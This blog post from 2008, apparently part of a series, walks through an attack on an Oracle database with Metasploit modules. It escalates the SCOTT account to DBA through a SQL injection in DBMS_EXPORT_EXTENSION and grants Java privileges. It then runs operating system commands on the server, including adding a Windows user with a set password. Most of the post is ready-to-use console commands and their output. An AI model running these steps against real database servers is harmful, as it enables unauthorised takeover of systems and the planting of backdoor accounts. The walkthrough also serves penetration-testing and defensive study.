Monday, November 17, 2008

Oracle Pwnage with the Metasploit Oracle Modules Part 2


Last post we got to where we could execute SQL queries on the box and were able to see Scott's permissions.

Let's use the SQLI auxiliary modules to see if we can add the DBA privilege to Scott's account.

As you recall....

msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO

[*] SCOTT,RESOURCE,NO,YES,NO

[*] Done...

[*] Auxiliary module execution completed

Let's try to escalate to DBA with the DBMS_EXPORT_EXTENSION exploit (auxiliary module)

msf auxiliary(oracle_sql) > back
msf > use auxiliary/sqli/oracle/

use auxiliary/sqli/oracle/ctxsys_driload

use auxiliary/sqli/oracle/dbms_export_extension

use auxiliary/sqli/oracle/dbms_metadata

use auxiliary/sqli/oracle/lt_findricset

use auxiliary/sqli/oracle/pitrig_truncate

msf > use auxiliary/sqli/oracle/dbms_export_extension

msf auxiliary(dbms_export_extension) > info


Name: SQL Injection via DBMS_EXPORT_EXTENSION.
Version: $Revision:$


Provided by:

MC


Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

DBA SCOTT no DB user to elevate to DBA.

DBPASS TIGER yes The password to authenticate as.

DBUSER SCOTT yes The username to authenticate as.

RHOST 127.0.0.1 yes The Oracle host.

RPORT 1521 yes The TNS port.

SID DEMO yes The sid to authenticate with.


Description:

This module will escalate a Oracle DB user to DBA by exploiting an

sql injection bug in the DBMS_EXPORT_EXTENSION package.


msf auxiliary(dbms_export_extension) > set RHOST 192.168.100.25

RHOST => 192.168.100.25

msf auxiliary(dbms_export_extension) > set SID
UNLUCKYXDB.MYPWN
SID =>
UNLUCKYXDB.MYPWN
msf auxiliary(dbms_export_extension) > run


[*] Sending package...

[*] Done...

[*] Sending body...

[*] Done...

[*] Sending declare...

[*] Done...

[*] Auxiliary module execution completed

msf auxiliary(dbms_export_extension) >


Let's check...

msf > use auxiliary/admin/oracle/oracle_sql
msf auxiliary(oracle_sql) >
**Same settings as before; check user's roles
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,DBA,NO,YES,NO <--New Privileges :-)
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >

Let's add Java privileges to the Scott account

msf auxiliary(oracle_sql) > set SQL "grant javasyspriv to SCOTT"
SQL => grant javasyspriv to SCOTT

msf auxiliary(oracle_sql) > run


[*] Sending SQL...
[*] Done...

[*] Auxiliary module execution completed


Let's check to see if it worked

msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs"

SQL => select * from user_role_privs

msf auxiliary(oracle_sql) > run


[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO

[*] SCOTT,DBA,NO,YES,NO

[*] SCOTT,JAVASYSPRIV,NO,YES,NO
<-- Yup it worked :-)
[*] SCOTT,RESOURCE,NO,YES,NO

[*] Done...

[*] Auxiliary module execution completed

msf auxiliary(oracle_sql) >


From there we can use the oracle_win32 auxiliary module to execute commands
http://metasploit.com/users/mc/oracle9i/oracle_win32.rb

msf > use auxiliary/admin/oracle/oracle_win32
msf auxiliary(oracle_win32) > info


Name: Execute win32 OS commands
Version: $Revision:$


Provided by:

MC


Basic options:

Name Current Setting Required Description

---- ------------- -------- -----------

CMD echo metasploit > %SYSTEMDRIVE%\\unbreakable.txt no The OS command to execute.

DBPASS TIGER yes The password to authenticate as.

DBUSER SCOTT yes The username to authenticate as.

RHOST 127.0.0.1 yes The Oracle host.

RPORT 1521 yes The TNS port.

SID DEMO yes The sid to authenticate with.


Description:

This module will create a java class which enables the execution of OS commands.

msf auxiliary(oracle_win32) > set CMD "net user dba P@ssW0rd1234 /add"

CMD => net user dba P@ssW0rd1234 /add

msf auxiliary(oracle_win32) > set SID
UNLUCKYXDB.MYPWN
SID =>
UNLUCKYXDB.MYPWN
msf auxiliary(oracle_win32) > set RHOST 192.168.100.25

RHOST => 192.168.100.25

msf auxiliary(oracle_win32) > run


[*] Creating MSF JAVA class...

[*] Done...

[*] Creating MSF procedure...

[*] Done...

[*] Sending command: 'net user dbaa P@ssW0rd1234 /add'

[*] Done...

[*] Auxiliary module execution completed


or you can test you are executing commands with ping

msf auxiliary(oracle_win32) > set CMD "ping 192.168.100.50"
CMD => ping 192.168.100.50

msf auxiliary(oracle_win32) > run


[*] Creating MSF JAVA class...
[*] Done...

[*] Creating MSF procedure...

[*] Done...

[*] Sending command: 'ping 192.168.100.50'

[*] Done...

[*] Auxiliary module execution completed

msf auxiliary(oracle_win32) >


on the other end, run tcpdump and filter for ICMP.

sudo tcpdump -i eth0 icmp

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

01:11:26.123515 IP 192.168.100.25 > 192.168.100.50: ICMP echo request, id 0, seq 8192, length 40

01:11:26.343528 IP 192.168.100.50 > 192.168.100.25: ICMP echo reply, id 0, seq 8192, length 40

---SNIP---


8 packets captured
8 packets received by filter

0 packets dropped by kernel


For the ninja shit, check out MC's demo text file.

**Issues, you cant see the output of your command, so you have to run stuff that you can see the results of, see the demo text file.

If you care to clean up, just revoke your DBA privileges with the oracle_sql module

"revoke dba from scott"
"revoke javaprivs from scott"

That's it!
CG

No comments: